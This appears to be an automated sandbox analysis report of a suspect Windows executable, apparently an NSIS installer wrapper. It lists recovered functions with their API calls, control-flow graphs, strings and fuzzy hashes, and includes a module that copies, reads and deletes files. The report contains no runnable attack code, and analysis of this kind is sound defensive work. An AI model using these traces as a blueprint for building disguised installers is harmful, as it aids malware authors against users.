                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                    • DrawTextA.USER32(00000000,0042EC00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                    • String ID: F
                                                                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                                                                    • Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                                                                                                                                                                                    • Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                                                                                                                                                                                    • Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4
                                                                                                                                                                                    Function 00405BD4 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 679 405bd4-405bf8 680 405c20-405c2f GetShortPathNameA 679->680 681 405bfa-405c12 call 405afe CloseHandle GetShortPathNameA 679->681 682 405c35-405c37 680->682 683 405d3f-405d43 680->683 681->683 688 405c18-405c1a 681->688 682->683 685 405c3d-405c7b wsprintfA call 405f87 call 405afe 682->685 685->683 692 405c81-405c9d GetFileSize GlobalAlloc 685->692 688->680 688->683 693 405ca3-405cad call 405b76 692->693 694 405d38-405d39 CloseHandle 692->694 693->694 697 405cb3-405cc0 call 405a63 693->697 694->683 700 405cc2-405cd4 lstrcpyA 697->700 701 405cd6-405ce8 call 405a63 697->701 703 405d0b 700->703 706 405d07 701->706 707 405cea-405cf0 701->707 705 405d0d-405d32 call 405ab9 SetFilePointer call 405ba5 GlobalFree 703->705 705->694 706->703 709 405cf8-405cfa 707->709 711 405cf2-405cf7 709->711 712 405cfc-405d05 709->712 711->709 712->705
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D65,?,?), ref: 00405C05
                                                                                                                                                                                    • GetShortPathNameA.KERNEL32(?,0042C600,00000400), ref: 00405C0E
                                                                                                                                                                                      • Part of subcall function 00405A63: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A73
                                                                                                                                                                                      • Part of subcall function 00405A63: lstrlenA.KERNEL32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA5
                                                                                                                                                                                    • GetShortPathNameA.KERNEL32(?,0042CA00,00000400), ref: 00405C2B
                                                                                                                                                                                    • wsprintfA.USER32 ref: 00405C49
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,?,0042CA00,?,?,?,?,?), ref: 00405C84
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C93
                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
                                                                                                                                                                                    • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D21
                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00405D32
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D39
                                                                                                                                                                                      • Part of subcall function 00405AFE: GetFileAttributesA.KERNEL32(?,00402D88,00436C00,80000000,?), ref: 00405B02
                                                                                                                                                                                      • Part of subcall function 00405AFE: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B24
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                    • String ID: %s=%s$[Rename]
                                                                                                                                                                                    • API String ID: 2171350718-1727408572
                                                                                                                                                                                    • Opcode ID: ff8ff72b881d1764c6ded4d329ff48958eda2edc6d0759682d82c86a4fea5b43
                                                                                                                                                                                    • Instruction ID: 17f8f1309641d4637e2ed4fc5cbc189083b9795c86085c8cd532ee5919f79a85
                                                                                                                                                                                    • Opcode Fuzzy Hash: ff8ff72b881d1764c6ded4d329ff48958eda2edc6d0759682d82c86a4fea5b43
                                                                                                                                                                                    • Instruction Fuzzy Hash: 61310131601B19ABD2206B65AD8DF6B3A5CDF45714F14053BBA01F62D2EA7CA8018EBD
                                                                                                                                                                                    Function 00404496 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 274stringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 715 404496-4044c0 716 4044c2-4044ce call 405665 call 4061cf 715->716 717 4044d3-4044dd 715->717 716->717 719 40454b-404552 717->719 720 4044df-4044f5 GetDlgItem call 40596a 717->720 723 404558-404561 719->723 724 404629-404630 719->724 733 404507-404540 SetWindowTextA call 404026 * 2 call 40405b call 4062fd 720->733 734 4044f7-4044ff call 405996 720->734 727 404563-40456e 723->727 728 40457b-404580 723->728 729 404632-404639 724->729 730 40463f-40465a call 405665 call 4059eb 724->730 735 4047d2-4047e4 call 40408d 727->735 736 404574 727->736 728->724 731 404586-4045c8 call 405f87 SHBrowseForFolderA 728->731 729->730 729->735 753 404663-40467b call 405f65 call 4062fd 730->753 754 40465c 730->754 747 404622 731->747 748 4045ca-4045e4 CoTaskMemFree call 4058fd 731->748 733->735 771 404546-404548 733->771 734->733 751 404501-404502 call 4058fd 734->751 736->728 747->724 760 4045e6-4045ec 748->760 761 40460e-404620 SetDlgItemTextA 748->761 751->733 772 4046b2-4046c3 call 405f65 call 405996 753->772 773 40467d-404683 753->773 754->753 760->761 764 4045ee-404605 call 405f87 lstrcmpiA 760->764 761->724 764->761 775 404607-404609 lstrcatA 764->775 771->719 783 4046c5 772->783 784 4046c8-4046e1 GetDiskFreeSpaceA 772->784 773->772 776 404685-404697 773->776 775->761 781 404699-40469b 776->781 782 40470a-404724 776->782 786 40469d 781->786 787 40469f-4046b0 call 405944 781->787 785 404726 782->785 783->784 784->785 789 4046e3-404708 MulDiv 784->789 790 40472b-404735 call 40492a 785->790 786->787 787->772 787->776 789->790 794 404750-404759 790->794 795 404737-40473e 790->795 797 40478b-404795 794->797 798 40475b-40476b call 404912 794->798 795->794 796 404740 795->796 799 404742-404747 796->799 800 404749 796->800 802 4047a1-4047a7 797->802 803 404797-40479e call 40140b 797->803 809 40477d-404786 SetDlgItemTextA 798->809 810 40476d-40477b call 40484d 798->810 799->794 799->800 800->794 804 4047a9 802->804 805 4047ac-4047bd call 404048 802->805 803->802 804->805 814 4047cc 805->814 815 4047bf-4047c5 805->815 809->797 810->797 814->735 815->814 817 4047c7 call 4043ef 815->817 817->814
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 004044E5
                                                                                                                                                                                    • SetWindowTextA.USER32(00000000,?), ref: 0040450F
                                                                                                                                                                                    • SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045C0
                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 004045CB
                                                                                                                                                                                    • lstrcmpiA.KERNEL32(0042E3A0,0042A870), ref: 004045FD
                                                                                                                                                                                    • lstrcatA.KERNEL32(?,0042E3A0), ref: 00404609
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040461B
                                                                                                                                                                                      • Part of subcall function 00405665: GetDlgItemTextA.USER32(?,?,00000400,00404652), ref: 00405678
                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,?,00000001,00429840,?,?,000003FB,?), ref: 004046D9
                                                                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046F4
                                                                                                                                                                                      • Part of subcall function 0040484D: lstrlenA.KERNEL32(0042A870,0042A870,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404768,000000DF,00000000,00000400,?), ref: 004048EB
                                                                                                                                                                                      • Part of subcall function 0040484D: wsprintfA.USER32 ref: 004048F3
                                                                                                                                                                                      • Part of subcall function 0040484D: SetDlgItemTextA.USER32(?,0042A870), ref: 00404906
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemText$Free$BrowseDiskFolderSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                    • String ID: A
                                                                                                                                                                                    • API String ID: 1128208598-3554254475
                                                                                                                                                                                    • Opcode ID: 20b6d9ced992337b1412f46738ab000ca340b2c21d94be4f2955b414de4e2f25
                                                                                                                                                                                    • Instruction ID: e7c3eafb31c7d15e6a6da749512948d226074c80576101813d8e7fa34d4e7a23
                                                                                                                                                                                    • Opcode Fuzzy Hash: 20b6d9ced992337b1412f46738ab000ca340b2c21d94be4f2955b414de4e2f25
                                                                                                                                                                                    • Instruction Fuzzy Hash: 44A190B1900209ABDB11AFA6CD45AAFB7B8EF85314F14843BF605B72D1D77C89418B2D
                                                                                                                                                                                    Function 00405F87 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 199stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(0042E3A0,00000400), ref: 004060B2
                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0042E3A0,00000400,?,0042A050,00000000,004050C4,0042A050,00000000), ref: 004060C5
                                                                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(004050C4,761F23A0,?,0042A050,00000000,004050C4,0042A050,00000000), ref: 00406101
                                                                                                                                                                                    • SHGetPathFromIDListA.SHELL32(761F23A0,0042E3A0), ref: 0040610F
                                                                                                                                                                                    • CoTaskMemFree.OLE32(761F23A0), ref: 0040611B
                                                                                                                                                                                    • lstrcatA.KERNEL32(0042E3A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040613F
                                                                                                                                                                                    • lstrlenA.KERNEL32(0042E3A0,?,0042A050,00000000,004050C4,0042A050,00000000,00000000,?,761F23A0), ref: 00406191
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406081
                                                                                                                                                                                    • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406139
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                    • API String ID: 717251189-730719616
                                                                                                                                                                                    • Opcode ID: 93175b9e86ceeaf5bc26d2662ee9bcff77ced71dd0aab543063507f0a11e8a4f
                                                                                                                                                                                    • Instruction ID: 1b13e8ff18f2312f61c88a614d7ce51b6c0fc9f7833a06fa9902b6248b39176d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 93175b9e86ceeaf5bc26d2662ee9bcff77ced71dd0aab543063507f0a11e8a4f
                                                                                                                                                                                    • Instruction Fuzzy Hash: D561F170A00105AEDF20AF24CC90BBB3BA5EB55314F56413FE903BA2D2C67D4962CB5E
                                                                                                                                                                                    Function 367B1CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 367B1D1B
                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,?,00000080,00000000,?,?,00000000), ref: 367B1D37
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 367B1D4B
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 367B1D58
                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 367B1D72
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 367B1D7D
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 367B1D8A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1454806937-0
                                                                                                                                                                                    • Opcode ID: ccf22585f54c7a7306a839019c49ca3f068ceeb9fc3059d9d66b394a6047fa29
                                                                                                                                                                                    • Instruction ID: 93a4485fdb45601b465fad2d48bfd012849a06e847ffdba4b1033fbb2548c650
                                                                                                                                                                                    • Opcode Fuzzy Hash: ccf22585f54c7a7306a839019c49ca3f068ceeb9fc3059d9d66b394a6047fa29
                                                                                                                                                                                    • Instruction Fuzzy Hash: C42130B595121CBFEB10DBA49C8CEEB7AACEB08354F9009A5F611E7140E7709E468B70
                                                                                                                                                                                    Function 00402F81 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CountTick$wsprintf
                                                                                                                                                                                    • String ID: (TA$(TA$... %d%%
                                                                                                                                                                                    • API String ID: 551687249-2950751476
                                                                                                                                                                                    • Opcode ID: ea954d237801f269f6a6cc6d2de777c833a7b6855df03dce106e68f46f520f78
                                                                                                                                                                                    • Instruction ID: f4b3021151c61e236b0315b1fcc5adb3b60be84788d5942dbd3e7f3cce39453d
                                                                                                                                                                                    • Opcode Fuzzy Hash: ea954d237801f269f6a6cc6d2de777c833a7b6855df03dce106e68f46f520f78
                                                                                                                                                                                    • Instruction Fuzzy Hash: 86517D71900219EBDB10DF65DA4469E7BB8EF48356F14853BE800BB2D0C7789E41CBAD
                                                                                                                                                                                    Function 0040408D Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000EB), ref: 004040AA
                                                                                                                                                                                    • GetSysColor.USER32(00000000), ref: 004040C6
                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 004040D2
                                                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 004040DE
                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 004040F1
                                                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00404101
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040411B
                                                                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404125
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                                                                    • Opcode ID: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                                                                                                                                                                                    • Instruction ID: 2d9fb341b818c34885f35f6e6d755d1b55c6e7706bb7847a6dc6733995099f15
                                                                                                                                                                                    • Opcode Fuzzy Hash: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A216F71500704ABCB219F68DE08A4BBBF8AF41714F048939EAD5F66A0C734E948CB64
                                                                                                                                                                                    Function 367B39BE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26280499259.00000000367B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 367B0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26280469171.00000000367B0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26280499259.00000000367C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                    • API String ID: 0-537541572
                                                                                                                                                                                    • Opcode ID: 596eef90506494ca93f4a26a8f9d123d52c4259eee859677f1c293f1308d1ce2
                                                                                                                                                                                    • Instruction ID: 7da7255c3a1d1f5bc573a4e2720eb26af5fab6d76e1d9be8cfec6c9e3b7764bf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 596eef90506494ca93f4a26a8f9d123d52c4259eee859677f1c293f1308d1ce2
                                                                                                                                                                                    • Instruction Fuzzy Hash: A711D876E05321ABFF118A698C84A1A375A9F00BB4FE00110F905FF180DBB0D941CEE0
                                                                                                                                                                                    Function 0040508C Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenA.KERNEL32(0042A050,00000000,?,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000,?), ref: 004050C5
                                                                                                                                                                                    • lstrlenA.KERNEL32(004030DC,0042A050,00000000,?,761F23A0,?,?,?,?,?,?,?,?,?,004030DC,00000000), ref: 004050D5
                                                                                                                                                                                    • lstrcatA.KERNEL32(0042A050,004030DC,004030DC,0042A050,00000000,?,761F23A0), ref: 004050E8
                                                                                                                                                                                    • SetWindowTextA.USER32(0042A050,0042A050), ref: 004050FA
                                                                                                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405120
                                                                                                                                                                                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513A
                                                                                                                                                                                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405148
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2531174081-0
                                                                                                                                                                                    • Opcode ID: 57bc30585033a45ff0503b142d8cfa380acccc19d4d3abea87a767d6a2fe19a3
                                                                                                                                                                                    • Instruction ID: 508789985144291932d060d6ef0b432b589b283746e8f0e3613f73f9cddaab2c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 57bc30585033a45ff0503b142d8cfa380acccc19d4d3abea87a767d6a2fe19a3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E217A71A00518BFDB119FA5CD85EDFBFA9EB05354F14807AF944AA290C6398A418F98
                                                                                                                                                                                    Function 00404957 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404972
                                                                                                                                                                                    • GetMessagePos.USER32 ref: 0040497A
                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404994
                                                                                                                                                                                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049A6
                                                                                                                                                                                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049CC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                                                    • String ID: f
                                                                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                                                                    • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                                                                                                                                    • Instruction ID: 403e93763916a0c69708d0661a5269b1e580af1e573dd698745729a1614bb606
                                                                                                                                                                                    • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 02015EB190021DBAEB01DBA4DD85BFFBBFCAF55711F10412BBA50B61C0C7B499018BA5
                                                                                                                                                                                    Function 00402C61 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C7C
                                                                                                                                                                                    • MulDiv.KERNEL32(?,00000064,?), ref: 00402CA7
                                                                                                                                                                                    • wsprintfA.USER32 ref: 00402CB7
                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00402CC7
                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CD9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • verifying installer: %d%%, xrefs: 00402CB1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000082.00000002.26258772178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000082.00000002.26258743685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258804466.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258839192.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000082.00000002.26258869692.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                                                                    • Opcode ID: 8cf66896cf3f33f8ea8d40d262e26d06426d7b5af9806429cf1dba26c1fd6b47
                                                                                                                                                                                    • Instruction ID: 537944924eabc97b3cccf86cf440a0916c3cc685b10ad000e4021125f5d30dc2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8cf66896cf3f33f8ea8d40d262e26d06426d7b5af9806429cf1dba26c1fd6b47
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3401FF7164020DFBEF209F61DD09EEE37A9AB04305F008039FA06A92D0DBB999558F59
                                                                                                                                                                                    Function 0040628F Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062A6
                                                                                                                                                                                    • wsprintfA.USER32 ref: 004062DF
